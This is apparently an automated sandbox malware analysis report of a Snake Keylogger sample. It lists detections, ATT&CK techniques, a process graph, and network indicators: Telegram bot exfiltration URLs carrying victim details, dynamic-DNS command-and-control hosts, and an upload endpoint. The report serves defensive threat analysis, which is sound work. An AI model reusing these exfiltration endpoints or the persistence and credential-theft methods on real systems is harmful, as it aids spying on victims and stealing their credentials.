                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7076, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7076, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.toggeries.exe.3700000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 5916, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1672, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: toggeries.exe PID: 2184, type: MEMORYSTR
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00956283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00956283
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00956747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00956747
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00B56283
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00B56747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                2
                Valid Accounts
                2
                Native API
                111
                Scripting
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                4
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder
                21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                Masquerading
                LSA Secrets231
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Virtualization/Sandbox Evasion
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588271 Sample: 6cicUo3f8g.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 api.telegram.org 2->32 34 3 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 52 10 other signatures 2->52 8 6cicUo3f8g.exe 4 2->8         started        12 wscript.exe 1 2->12         started        signatures3 48 Tries to detect the country of the analysis system (by using the IP) 30->48 50 Uses the Telegram API (likely for C&C communication) 32->50 process4 file5 26 C:\Users\user\AppData\Local\...\toggeries.exe, PE32 8->26 dropped 58 Binary is likely a compiled AutoIt script file 8->58 14 toggeries.exe 2 8->14         started        60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->60 18 toggeries.exe 1 12->18         started        signatures6 process7 file8 28 C:\Users\user\AppData\...\toggeries.vbs, data 14->28 dropped 62 Multi AV Scanner detection for dropped file 14->62 64 Binary is likely a compiled AutoIt script file 14->64 66 Machine Learning detection for dropped file 14->66 72 2 other signatures 14->72 20 RegSvcs.exe 15 2 14->20         started        68 Writes to foreign memory regions 18->68 70 Maps a DLL or memory area into another process 18->70 24 RegSvcs.exe 2 18->24         started        signatures9 process10 dnsIp11 36 checkip.dyndns.com 132.226.247.73, 49716, 49734, 49746 UTMEMUS United States 20->36 38 api.telegram.org 149.154.167.220, 443, 49811, 61868 TELEGRAMRU United Kingdom 20->38 40 reallyfreegeoip.org 104.21.32.1, 443, 49722, 49728 CLOUDFLARENETUS United States 20->40 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 signatures12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                6cicUo3f8g.exe83%ReversingLabsWin32.Spyware.Snakekeylogger
                6cicUo3f8g.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Thebesian\toggeries.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Thebesian\toggeries.exe83%ReversingLabsWin32.Spyware.Snakekeylogger
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.32.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        206.23.85.13.in-addr.arpa
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:44:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:53:48%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://www.office.com/RegSvcs.exe, 00000008.00000002.4584508040.000000000270A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.orgRegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.org/bottoggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microsoftRegSvcs.exe, 00000008.00000002.4592912814.0000000005B10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.office.com/lBRegSvcs.exe, 00000003.00000002.4584887740.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002714000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.orgRegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000008.00000002.4584508040.00000000026E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.ecosia.org/newtab/RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://varders.kozow.com:8081toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://aborters.duckdns.org:8081toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://anotherarmy.dns.army:8081toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.org/qtoggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enlBRegSvcs.exe, 00000003.00000002.4584887740.0000000002EB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://reallyfreegeoip.orgRegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.000000000260F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20aRegSvcs.exe, 00000003.00000002.4584887740.0000000002E07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002637000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4584887740.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000003.00000002.4589994013.000000000402F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4589994013.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.0000000003571000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4589202032.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedtoggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reallyfreegeoip.org/xml/toggeries.exe, 00000002.00000002.2202324429.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4584887740.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4582708579.0000000000402000.00000040.80000000.00040000.00000000.sdmp, toggeries.exe, 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4584508040.00000000025A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          149.154.167.220
                                                                                          api.telegram.orgUnited Kingdom
                                                                                          62041TELEGRAMRUfalse
                                                                                          104.21.32.1
                                                                                          reallyfreegeoip.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          132.226.247.73
                                                                                          checkip.dyndns.comUnited States
                                                                                          16989UTMEMUSfalse
                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1588271
                                                                                          Start date and time:2025-01-10 23:18:16 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 45s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:10
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Sample name:6cicUo3f8g.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@5/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 80%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 57
                                                                                          • Number of non-executed functions: 274
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 13.85.23.206, 172.202.163.200
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target RegSvcs.exe, PID 1672 because it is empty
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • VT rate limit hit for: 6cicUo3f8g.exe
                                                                                          TimeTypeDescription
                                                                                          17:19:16API Interceptor12690711x Sleep call for process: RegSvcs.exe modified
                                                                                          23:19:16AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          149.154.167.220C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              104.21.32.1QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.mzkd6gp5.top/3u0p/
                                                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                              • redroomaudio.com/administrator/index.php
                                                                                                              132.226.247.73rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • checkip.dyndns.org/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              reallyfreegeoip.org7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.80.1
                                                                                                              rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.96.1
                                                                                                              4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.112.1
                                                                                                              b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.80.1
                                                                                                              UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.48.1
                                                                                                              9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.32.1
                                                                                                              VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
